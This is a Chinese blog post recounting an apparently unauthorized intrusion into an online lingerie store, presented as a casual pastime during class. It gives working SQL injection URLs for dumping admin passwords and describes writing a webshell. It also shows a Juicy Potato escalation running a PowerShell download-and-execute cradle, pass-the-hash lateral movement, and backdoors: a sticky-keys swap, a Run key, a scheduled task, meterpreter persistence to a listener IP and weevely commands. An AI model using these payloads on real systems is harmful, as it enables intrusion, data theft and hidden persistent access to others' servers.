mysql开源内库_记一次内衣渗透测试

文章很水,被学校强迫去上syb创业指导课,同桌上课难耐,人多又不敢去p站看考研视频,只能逛逛这些nei衣店缓冲一下,于是就有了下文

0x01 SQL注入

cc83aa04260d6214bc0ccb3b84dc5d34.png

这站真大,不对,这站真圆.php的站随便随便一测

a0127572c6b8a362b5a2fd24dacad8b0.png

一枚注入

b8b509353e3318287b354f8eb6a25101.png

34f7c5fce1815326c87dd1700279cf05.png

因为只能读取32位所以使用substring分开读取 https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,(select password from admin limit 1,1),0x7e))%20# https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,substring((select password from admin limit 1,1),30,35),0x7e))%20#

3d14d018b365e8e7b210d1845fd9fdcb.png

舒服了,这下可以给光明正大的进去选内衣了

0x02 拿shell

看看robots.txt

d8059df9ec963d5c840b13ee2f196f02.png

inurl:a.com admin

进入后台发现是ECSHOP 这里原本是file改为image绕过

2b60ea3e5cb731c26560f4660b2c3b58.png

似乎不行被重置了

这里发现可以执行sql语句而且存在绝对路径泄露

a8cfca8137b9299e98e0ea6d5a8b50ef.png

e53bc5229269f5c8fb8a238b00d198f9.png

ok下面就好说了,写入一句话

770d3d7742c2c7794f7f6ac899d92597.png

0x03 提权

36cfd3cca5e76a2dbc9e77aaddc9dbf8.png

权限有点小低

829865e2a97187043a32fbcfc8508fac.png

存在mysql也没其他可以利用的

5b33b495b7cec19c92379361e5cbb185.png

尝试mysql提权

1cc02a364ed2e3c6508a832afe2bb214.png

7ca3791c5b6403b8df6c7f223bdd2c98.png

除了目录不能上传其他条件都满足所以当我没说,上cs,powershell上线

10537331454e8e243072769f0b20335a.png

提权这里使用Juicy Potato 具体可以参考三好学生文章 选择想要的任何CLSID,链接

b4debcfc1cdf20a61e739ce98b351e76.png

然后我们在以system权限执行powershell

shell style.exe-p"powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('powershell地址'))\""-c{e60687f7-01a1-40aa-86ac-db1cbf673334}

这里面的双引号记得转义

ffba1c4c7d0651b1ed8c01bf7aedc898.png

0x04 横向渗透

6a4a72a2c91c6a2c34757b48e6c0137b.png

为工作组环境,扫出来0.9也是一台web这里hash传递直接拿下,继续抓hash,目前以有如下账户 wiseadmin shopaccount mysql wiseadmin filetransfer demoadmin WDAGUtilityAccount

平平无奇hash传递--

ee28cbd6e9bcf24645261f1f90ff4ef8.png

一个应该是web的的一个demo,然后0.7可能是数据库服务器

都是admin权限了如果想要获取system的话可以使用SelectMyParent,其实也就是j把新进程当中system进程的子进程,这里就用cs的马,先查看winlogon.exe的pid

可以看到这里为500

780297ac7dc7537dd1c4ac75a5e7515b.png

然后把我们的systen.exe上传,执行shell SelectMyParent.exe systen.exe 500

9b9715492327b5e9a3cbff8e16361065.png

这步操作其实就是凑点字数 ,哈哈哈哈

0x05 权限维持

这里就拿本机测试了

粘滞键后门 在windows上连续按5次“Shift”,就可以调出粘滞键

c36d2703842c5686b1f19462c546382f.png

粘滞键指的是电脑使用中的一种快捷键,专为同时按下两个或多个键有困难的人而设计的。粘滞键的主要功能是方便Shift等键的组合使用。粘滞键可以先按一个键位(如shift),再按另一键位,而不是同时按下两个键位,方便某些因身体原因而无法同时按下多键的人。一般的电脑连按五次shift会出现粘滞键提示

使用如下命令

cd windows\system32move sethc.exe sethc.exe.bakcopy cmd.exe sethc.exe

2f4afcc31d80c05c8bf5330000fb72ed.png

如果目标机是 winvista 以上的,即 winvista 以后出的系统,修改 sethc 会提示需要 trustedinstaller 权限,所以想要继续,那就需要修改所有者为Administrator,并修改其权限:

973b55013fad6748d53c12f9553d0d22.png

110709cde4ede70f5c3602e60f456078.png

92b452edd5f98cc23e5b1ec42220d535.png

9c31137f0923910fbe0f1123dacea9db.png

然后修改为完全控制

f38121124bd5bfb68a344f97b844b445.png

425ce7f0e4edf69cbba9188f0b5de38b.png

现在我们连续按下5次shift就弹出一个system权限的cmd

1b21d89943ff7e5e68a5a0d01ba2ecd6.png

注册表注入后门 在普通用户权限下,攻击者将会需要执行的后门程序或者脚本路径写到注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 键值可以任意设置,或者直接执行如下命令添加启动项 REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "C:\shell.exe" 当管理员重新登录系统时,就会执行后门程序

5b997b4ae63ecb8b21f7d26a07c749bd.png

计划任务后门

命令:schtasks /Create /tn Updater /tr c:\shell.exe /sc hourly /mo 1

以上的命令会在每小时执行一次shell.exe,在win7及以下的系统使用at命令代替schtasks

meterpreter后门

meterpreter > run persistence -U -i 5 -p 1234 -r 192.168.220.128 -A自动启动一个匹配的exploit / multi / handler来连接到代理 -L 如果未使用%TEMP%,则在目标主机中写入有效负载的位置。-P 有效负载使用,默认为windows / meterpreter / reverse_tcp。-S 作为服务自动启动该木马(具有SYSTEM权限)-T 要使用的备用可执行模板-U 用户登录时自动启动该木马-X 系统引导时自动启动该木马-h 这个帮助菜单-i 每次连接尝试之间的时间间隔(秒)-p 运行Metasploit的系统正在侦听的端口-r 运行Metasploit监听连接的系统的IP

缺点是容易被杀毒软件查杀,然后它就在目标机新建一个vbs文件,然后每次自动启动他

25a4d49ac9367505d759080cbdd9148d.png

web后门的话可以使用weevely 这里生成一个shell.php来测试

3d7478befb79dbb9e1a0b23a7c19427d.png

687008a91036189c159fe332f6f8c59d.png

将文件放入服务器目录下,然后执行

weevely http://192.168.220.1/shell.php

shell 可以help查看帮助

audit.etcpasswd | 枚举/etc/passwdaudit.userfiles | 列举用户/home下具有权限的文件audit.mapwebfiles | 枚举任意Web站点的URL链接shell.php | 编写php文件shell.sh | 编写系统脚本system.info | 收集系统信息find.suidsgid | 查找SUID / SGID文件和目录find.perms | 查找权限可读/写/可执行文件和目录backdoor.tcp | TCP端口后门backdoor.reversetcp | 反弹TCP连接bruteforce.sql | 爆破指定数据库用户名密码bruteforce.sqlusers | 爆破所有数据库用户密码file.upload | 上传本地文件file.upload2web | 上传二进制/ ASCII文件至目标站点文件夹并枚举URL file.enum | 在本地词表的书面枚举远程文件file.read | 读文件file.rm | 删除文件file.check | 检查远程文件的状态(md5值,大小,权限等)file.download | 下载远程二进制/ ASCII文件到本地sql.console | 启动SQL控制台sql.dump | 备份数据库,即脱库net.scan | 端口扫描net.phpproxy | 安装远程php代理net.ifaces | 显示远程主机网络接口信息net.proxy | 安装隧道通信代理

执行一些windows命令

9e37892b694f6e0bb2ffcf31bfeac2b2.png

执行自带命令

7d417f72a967f0a20ec6da14f4d0a369.png

a5d6791d0c5c2e55fffb83d4243ea258.png

884a4f68e6ddf407137a6dde9606fac6.png

原创投稿作者:一寸一叶

11eabe9b0635b69257f22747a168a449.gif

f82efcf3fda0de443c765bdb2f58ce6f.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值